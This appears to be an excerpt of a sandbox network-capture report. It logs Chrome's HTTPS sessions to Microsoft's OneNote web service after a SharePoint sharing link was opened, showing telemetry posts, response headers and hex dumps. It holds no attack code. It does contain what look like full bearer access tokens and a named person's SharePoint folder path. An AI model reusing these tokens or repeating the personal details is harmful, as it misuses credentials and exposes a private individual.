                                                2022-10-03 13:39:37 UTC724OUTData Raw: 7b 22 54 22 3a 31 36 36 34 38 33 36 37 34 36 30 39 35 2c 22 4c 22 3a 5b 7b 22 47 22 3a 34 33 31 30 38 30 34 2c 22 54 22 3a 31 36 30 31 37 2c 22 4d 22 3a 22 7b 5c 22 55 72 6c 5c 22 3a 5c 22 68 74 74 70 73 3a 2f 2f 61 75 67 6c 6f 6f 70 2e 6f 66 66 69 63 65 2e 63 6f 6d 2f 5c 22 2c 5c 22 49 6e 69 74 69 61 74 6f 72 54 79 70 65 5c 22 3a 5c 22 78 6d 6c 68 74 74 70 72 65 71 75 65 73 74 5c 22 2c 5c 22 52 65 64 69 72 65 63 74 53 74 61 72 74 5c 22 3a 5c 22 30 5c 22 2c 5c 22 52 65 64 69 72 65 63 74 45 6e 64 5c 22 3a 5c 22 30 5c 22 2c 5c 22 46 65 74 63 68 53 74 61 72 74 5c 22 3a 5c 22 33 37 38 36 38 2e 32 5c 22 2c 5c 22 44 6f 6d 61 69 6e 4c 6f 6f 6b 75 70 53 74 61 72 74 5c 22 3a 5c 22 30 5c 22 2c 5c 22 44 6f 6d 61 69 6e 4c 6f 6f 6b 75 70 45 6e 64 5c 22 3a 5c 22 30 5c
                                                Data Ascii: {"T":1664836746095,"L":[{"G":4310804,"T":16017,"M":"{\"Url\":\"https://augloop.office.com/\",\"InitiatorType\":\"xmlhttprequest\",\"RedirectStart\":\"0\",\"RedirectEnd\":\"0\",\"FetchStart\":\"37868.2\",\"DomainLookupStart\":\"0\",\"DomainLookupEnd\":\"0\
                                                2022-10-03 13:39:37 UTC725INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 44fbf0dc-2787-42cd-88db-f8ffa84c9a5e
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000006A3
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000006A3
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_onenoteslice,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 8A5F65C57FCE4802A45A515D1CDF83DD Ref B: AMS231032609039 Ref C: 2022-10-03T13:39:37Z
                                                Date: Mon, 03 Oct 2022 13:39:36 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                42192.168.2.34998913.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:40:08 UTC727OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 237
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-AccessTokenTtl: 1664840296804
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                sec-ch-ua-platform: "Windows"
                                                haep: 1
                                                X-AccessToken: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9.eyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0.EWb66LDcPK9or86SYiXEnS8X85go_GF6jrytmNe-VM0DP1xedkdH8-P7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O_cBiZszwxDu1rJtgjSTldsdPBQi-x4isn_tXs1kVY3k0U38ib-UTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe_YJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                X-UserType: WOPI
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
                                                2022-10-03 13:40:08 UTC730OUTData Raw: 7b 22 54 22 3a 31 36 36 34 38 33 36 37 37 37 30 38 37 2c 22 4c 22 3a 5b 7b 22 47 22 3a 35 39 30 39 30 31 39 37 36 2c 22 54 22 3a 39 30 30 31 2c 22 4d 22 3a 22 7b 5c 22 46 72 6f 6d 53 74 61 74 65 5c 22 3a 5c 22 70 61 73 73 69 76 65 5c 22 2c 5c 22 54 6f 53 74 61 74 65 5c 22 3a 5c 22 68 69 64 64 65 6e 5c 22 2c 5c 22 4f 72 69 67 69 6e 61 74 69 6e 67 45 76 65 6e 74 5c 22 3a 5c 22 54 61 73 6b 49 74 65 6d 5c 22 2c 5c 22 54 69 6d 65 49 6e 53 74 61 74 65 5c 22 3a 5c 22 35 38 34 38 31 5c 22 7d 22 2c 22 43 22 3a 33 32 34 2c 22 44 22 3a 35 30 7d 5d 2c 22 53 22 3a 22 66 34 66 62 33 35 61 62 2d 38 37 32 62 2d 34 38 33 31 2d 38 30 63 64 2d 36 30 66 31 37 34 31 66 39 63 33 31 22 2c 22 49 22 3a 35 2c 22 56 22 3a 31 7d
                                                Data Ascii: {"T":1664836777087,"L":[{"G":590901976,"T":9001,"M":"{\"FromState\":\"passive\",\"ToState\":\"hidden\",\"OriginatingEvent\":\"TaskItem\",\"TimeInState\":\"58481\"}","C":324,"D":50}],"S":"f4fb35ab-872b-4831-80cd-60f1741f9c31","I":5,"V":1}
                                                2022-10-03 13:40:08 UTC730INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 807f8b77-fe57-4078-adb8-65186a697109
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF00000696
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF00000696
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_visioslice_control,afd_wordcapacity_2_control,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: F1533A9C449B4585B518D6566B58FEB6 Ref B: AMS231032608003 Ref C: 2022-10-03T13:40:08Z
                                                Date: Mon, 03 Oct 2022 13:40:07 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.34971813.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:17 UTC89OUTPOST /o/RemoteUls.ashx?usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&officeserverversion=16.0.15707.41015 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 2082
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Content-Type: text/plain;charset=UTF-8
                                                Accept: */*
                                                Origin: https://insacentre-my.sharepoint.com
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://insacentre-my.sharepoint.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2022-10-03 13:38:17 UTC90OUTData Raw: 7b 22 54 22 3a 31 36 36 34 38 33 36 36 39 37 33 31 37 2c 22 4c 22 3a 5b 7b 22 47 22 3a 35 39 36 34 34 34 32 33 38 2c 22 54 22 3a 33 2c 22 4d 22 3a 22 48 6f 73 74 49 6e 69 74 44 69 61 67 6e 6f 73 74 69 63 73 3a 20 7b 5c 22 65 6e 74 72 79 50 6f 69 6e 74 5c 22 3a 5c 22 53 68 61 72 69 6e 67 5c 22 2c 5c 22 75 73 65 72 43 6c 69 63 6b 54 69 6d 65 5c 22 3a 31 36 36 34 38 33 36 36 39 34 33 37 31 2c 5c 22 68 6f 73 74 50 61 67 65 46 69 72 73 74 46 6c 75 73 68 54 69 6d 65 5c 22 3a 31 36 36 34 38 33 36 36 39 36 39 39 35 2c 5c 22 6f 66 66 69 63 65 42 6f 6f 74 73 74 72 61 70 70 65 72 53 74 61 72 74 54 69 6d 65 5c 22 3a 31 36 36 34 38 33 36 36 39 37 30 30 35 2c 5c 22 6f 66 66 69 63 65 42 6f 6f 74 73 74 72 61 70 70 65 72 45 6e 64 54 69 6d 65 5c 22 3a 31 36 36 34 38 33 36
                                                Data Ascii: {"T":1664836697317,"L":[{"G":596444238,"T":3,"M":"HostInitDiagnostics: {\"entryPoint\":\"Sharing\",\"userClickTime\":1664836694371,\"hostPageFirstFlushTime\":1664836696995,\"officeBootstrapperStartTime\":1664836697005,\"officeBootstrapperEndTime\":1664836
                                                2022-10-03 13:38:17 UTC92INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 1a989ad9-573c-4d48-9e3c-4dde5698d8b6
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: PA1PEPF0001FED1
                                                X-OfficeVersion: 16.0.15726.41002
                                                X-OfficeCluster: GEU9
                                                Access-Control-Allow-Origin: https://insacentre-my.sharepoint.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-bULS-SuppressedTags: 378069,1671813,2209344,3249545,3290144,4298965,4298968,4298969,4751696,5306497,5904476,6375195,6572226,6948167,7463498,17085210,17085216,17162522,17358857,19743902,19939648,20486158,21627712,21631370,22401293,22410500,22558617,22598977,22680210,22680213,22680214,22836558,22946650,23909858,24401375,24462656,24515087,25514973,33592839,34388130,35682372,36472266,36546380,36546381,36546382,36569418,36708451,36773964,36791688,36811158,36811159,36963655,37288035,37876293,37876294,37889309,38293640,38535900,38543496,38580697,38637954,38922202,39076766,39076767,39105358,39408129,39613840,39966341,40437001,40777251,40935455,40957978,40957979,41003225,41207258,41502555,41711299,41952657,41964821,41964885,42272991,42496725,42513088,42815875,42857251,50406866,50431969,50619726,50622685,50622687,51451613,51492170,51504083,51667010,306230939,306978834,520979847,521007315,521749855,524150164,524883107,524883136,524883138,537159499,537169937,538542792,538543587,539075678,539874723,540378699,540378700,542700237,542994947,545783884,557077970,557322386,557389507,557670930,558735363,559423838,559424262,559486496,559760215,559760216,570507662,571549507,571786073,571786074,574468116,575157663,575157664,575157665,575157666,575157667,575157696,575157697,575157698,575157699,575157700,575157701,575157702,577295376,577626581,577831138,578164000,587862985,589101015,589101018,591684683,591729363,592259104,592556551,592843145,593780815,593838232,593862981,594134597,594396706,594830612,595137156,595714715,595895774,596115913,596444186,596464289,845836083,845836084,845836085,846166132,876178018,963472182,1630679666,1630679667,1633958006,1647605351,1664576567,1698260075,1718235956,1765045358,1802139698,1986689397,1986689633,1986689647,1986748791,1986748793,1986749030,1986749288,1986749546,2004443760,2004444278,2004448354
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: PA1PEPF0001FED1
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_pptcapacity_2_control,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: DC1EB378DBBA4040A3A79F712B13DD53 Ref B: AMS231032608007 Ref C: 2022-10-03T13:38:17Z
                                                Date: Mon, 03 Oct 2022 13:38:17 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.34972113.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:17 UTC95OUTPOST /o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 5491
                                                Cache-Control: max-age=0
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                Origin: https://insacentre-my.sharepoint.com
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: iframe
                                                Referer: https://insacentre-my.sharepoint.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2022-10-03 13:38:17 UTC96OUTData Raw: 61 63 63 65 73 73 5f 74 6f 6b 65 6e 3d 65 79 4a 30 65 58 41 69 4f 69 4a 4b 56 31 51 69 4c 43 4a 68 62 47 63 69 4f 69 4a 53 55 7a 49 31 4e 69 49 73 49 6e 67 31 64 43 49 36 49 6d 46 72 55 46 52 46 54 7a 52 59 55 30 4e 34 63 33 68 58 4f 54 42 48 4d 6c 39 5a 64 31 6c 57 52 47 64 49 59 79 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 33 62 33 42 70 4c 32 6c 75 63 32 46 6a 5a 57 35 30 63 6d 55 74 62 58 6b 75 63 32 68 68 63 6d 56 77 62 32 6c 75 64 43 35 6a 62 32 31 41 5a 6a 63 30 4d 6a 45 30 4e 54 41 74 5a 47 59 78 4e 69 30 30 4e 7a 45 30 4c 57 46 6b 59 54 45 74 4d 7a 6b 31 4d 7a 6b 77 59 32 49 35 4d 57 51 7a 49 69 77 69 61 58 4e 7a 49 6a 6f 69 4d 44 41 77 4d 44 41 77 4d 44 4d 74 4d 44 41 77 4d 43 30 77 5a 6d 59 78 4c 57 4e 6c 4d 44 41 74 4d 44 41 77 4d 44 41 77 4d
                                                Data Ascii: access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9.eyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwM
                                                2022-10-03 13:38:17 UTC102INHTTP/1.1 200 OK
                                                Cache-Control: no-cache, no-store
                                                Pragma: no-cache
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=utf-8
                                                Expires: -1
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; path=/; samesite=none; secure
                                                X-CorrelationId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                Origin-Trial: Av/V1OIQEg1NnsGePStscuk3wq4vcXOXMgC9FgVS6qT/EXVQYN3Od6vRI1SBm0VaYGTtWDP/tGvfx2YqK9SDWlYAAABteyJvcmlnaW4iOiJodHRwczovL29mZmljZWFwcHMubGl2ZS5jb206NDQzIiwiaXNTdWJkb21haW4iOnRydWUsImZlYXR1cmUiOiJIYXB0aWNzRGV2aWNlIiwiZXhwaXJ5IjoxNjcyNTMxMTk5fQ==
                                                X-OfficeFE: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                X-Content-Type-Options: nosniff
                                                Content-Security-Policy-Report-Only: font-src data: c1-onenote-15.cdn.office.net *.skype.com *.skypeassets.com *.msocdn.com sway.com *.sway-cdn.com sway-cdn.com *.sharepointonline.com spoprod-a.akamaihd.net *.azureedge.net fs.microsoft.com *.microsoft.com https:; script-src 'self' 'unsafe-inline' 'unsafe-eval' c1-onenote-15.cdn.office.net uci.officeapps.live.com cdn.uci.edog.officeapps.live.com cdn.uci.officeapps.live.com uci.edog.cdn.office.net uci.cdn.office.net c1-officeapps-15.cdn.office.net *.skype.com *.skypeassets.com *.msocdn.com js.live.net appsforoffice.microsoft.com contentstorage.osi.office.net *.growth.office.net *.rt.microsoft.com res-prod.cdn.office.net res.cdn.office.net messaging.office.com messaging.growth.office.com messaging.action.office.com messaging.engagement.office.com content.lifecycle.office.net www.microsoft.com *.video.msn.com realtimesync.onenote.com oreonavpane.azureedge.net contentstorage.onenote.office.net *.msftauth.net *.officeapps.live.com https:; script-src-elem 'self' 'unsafe-inline' 'unsafe-eval' c1-onenote-15.cdn.office.net uci.officeapps.live.com cdn.uci.edog.officeapps.live.com cdn.uci.officeapps.live.com uci.edog.cdn.office.net uci.cdn.office.net c1-officeapps-15.cdn.office.net *.skype.com *.skypeassets.com *.msocdn.com js.live.net appsforoffice.microsoft.com contentstorage.osi.office.net *.growth.office.net *.rt.microsoft.com res-prod.cdn.office.net res.cdn.office.net messaging.office.com messaging.growth.office.com messaging.action.office.com messaging.engagement.office.com content.lifecycle.office.net www.microsoft.com *.video.msn.com realtimesync.onenote.com oreonavpane.azureedge.net contentstorage.onenote.office.net *.msftauth.net *.officeapps.live.com https:; style-src 'self' 'unsafe-inline' 'unsafe-eval' c1-onenote-15.cdn.office.net c1-officeapps-15.cdn.office.net *.skype.com *.skypeassets.com *.msocdn.com js.live.net sway.com *.sway-cdn.com sway-cdn.com * https:; style-src-elem 'self' 'unsafe-inline' 'unsafe-eval' c1-onenote-15.cdn.office.net c1-officeapps-15.cdn.office.net *.skype.com *.skypeassets.com *.msocdn.com js.live.net sway.com *.sway-cdn.com sway-cdn.com * https:; media-src *.skype.com *.skypeassets.com 'self' * https:; object-src 'self' * https:; child-src blob: * onenote: https:; worker-src blob: * https:; img-src * data: blob: https:; report-uri /o/reportcsp.ashx
                                                Document-Policy: js-profiling
                                                X-OFFICEFD: AM1PEPF000094C7
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_visioslice_control,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 288685A232DD46068E0C52A19EBD9E65 Ref B: AMS231032607031 Ref C: 2022-10-03T13:38:17Z
                                                Date: Mon, 03 Oct 2022 13:38:16 GMT
                                                Connection: close
                                                2022-10-03 13:38:17 UTC105INData Raw: 32 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 76 61 72 20 67 5f 66 69 72 73 74 42 79 74 65 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 20 66 75 6e 63 74 69 6f 6e 20 68 69 67 68 52 65 73 54 69 6d 65 53 74 61 6d 70 28 29 20 7b 20 69 66 20 28 70 65 72 66
                                                Data Ascii: 22d<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><script type="text/javascript"> var g_firstByte = new Date(); function highResTimeStamp() { if (perf
                                                2022-10-03 13:38:17 UTC106INData Raw: 32 30 30 30 0d 0a 76 61 72 20 67 5f 62 6f 6f 74 53 63 72 69 70 74 73 45 6e 64 54 69 6d 65 3b 20 3c 2f 73 63 72 69 70 74 3e 3c 21 5b 69 66 20 67 74 65 20 49 45 20 38 5d 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 2e 41 70 70 4c 6f 67 6f 20 7b 77 69 64 74 68 3a 31 38 30 70 78 3b 68 65 69 67 68 74 3a 31 38 30 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 63 61 6c 65 44 6f 77 6e 49 6e 20 2e 33 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 39 2c 2e 32 2c 31 29 20 62 6f 74 68 2c 66 61 64 65 49 6e 20 2e 31 73 20 6c 69 6e 65 61 72 20 62 6f 74 68 3b 7d 20 2e 4d 73 4c 6f 67 6f 20 7b 77 69 64 74 68 3a 39 39 70 78 3b 68 65 69 67 68 74 3a 32 31 70 78 3b 62 6f 74 74 6f 6d 3a 33 36 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 20 66 61 64
                                                Data Ascii: 2000var g_bootScriptsEndTime; </script><![if gte IE 8]><style type="text/css"> .AppLogo {width:180px;height:180px;animation:scaleDownIn .3s cubic-bezier(.1,.9,.2,1) both,fadeIn .1s linear both;} .MsLogo {width:99px;height:21px;bottom:36px;animation: fad
